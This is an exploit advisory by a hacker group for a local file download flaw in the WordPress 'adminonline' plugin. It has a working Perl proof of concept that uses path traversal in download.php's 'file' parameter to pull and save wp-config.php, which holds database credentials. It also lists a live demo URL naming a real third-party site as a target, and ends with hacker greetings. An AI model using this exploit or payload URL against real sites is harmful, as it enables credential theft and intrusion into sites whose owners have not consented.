GGGGGGGGGGGGG HHHHHHHHH HHHHHHHHH BBBBBBBBBBBBBBBBB GGG::::::::::::G H:::::::H H:::::::H B::::::::::::::::B GG:::::::::::::::G H:::::::H H:::::::H B::::::BBBBBB:::::B G:::::GGGGGGGG::::G HH::::::H H::::::HH BB:::::B B:::::B G:::::G GGGGGG H:::::H H:::::H B::::B B:::::B G:::::G H:::::H H:::::H B::::B B:::::B G:::::G H::::::HHHHH::::::H B::::BBBBBB:::::B G:::::G GGGGGGGGGG H:::::::::::::::::H B:::::::::::::BB G:::::G G::::::::G H:::::::::::::::::H B::::BBBBBB:::::B G:::::G GGGGG::::G H::::::HHHHH::::::H B::::B B:::::B G:::::G G::::G H:::::H H:::::H B::::B B:::::B G:::::G G::::G H:::::H H:::::H B::::B B:::::B G:::::GGGGGGGG::::G HH::::::H H::::::HH BB:::::BBBBBB::::::B GG:::::::::::::::G H:::::::H H:::::::H B:::::::::::::::::B GGG::::::GGG:::G H:::::::H H:::::::H B::::::::::::::::B GGGGGG GGGG HHHHHHHHH HHHHHHHHH BBBBBBBBBBBBBBBBB Grey Hat Boy [+] Title : Wordpress adminonline Plugin Local File Download [+] Discovered By : Medrik [+] CMS Home-Page : http://wordpress.org [+] Found Date : 2014-06-11 [+] Tested On : Windows ################################### With this Vulnerability You Can Download Target Local Files . This is LFD Vulnerability In : File : Download.php Parameter : File ########[ Simple Perl Poc ]######## use LWP::Simple; $target = 'your target here'; $confPath = '/wp-content/plugins/adminonline/product/download.php?file=../../../../wp-config.php'; $req = get $target.$confPath; if ($req =~ /package WordPress/){ print "\n Downloading Config ..."; open (CONFIG , ">wp-config.txt"); print CONFIG $req; print "\n $target Config Downloaded To File : Wp-config.txt !\n"; } ########[ End Perl Code ]######## Vulnerability (Locate) : http://Vulnerable_Host/wp-content/plugins/adminonline/product/download.php?file=[LFD] Demo : http://www.cocl.ca/wp-content/plugins/adminonline/product/download.php?file=../../../../wp-config.php Gr33tz : Beni_Vanda , Black_KinG , M.R.S.CO , Dr.3v1l , 8ThBiT , Enddo , Explo!ter , YoSeF__HaCkeR , Moji_RideR , E2MA3N - S!Y0U.T4r.6T - 0x0ptim0us - ARTA And All My Friends .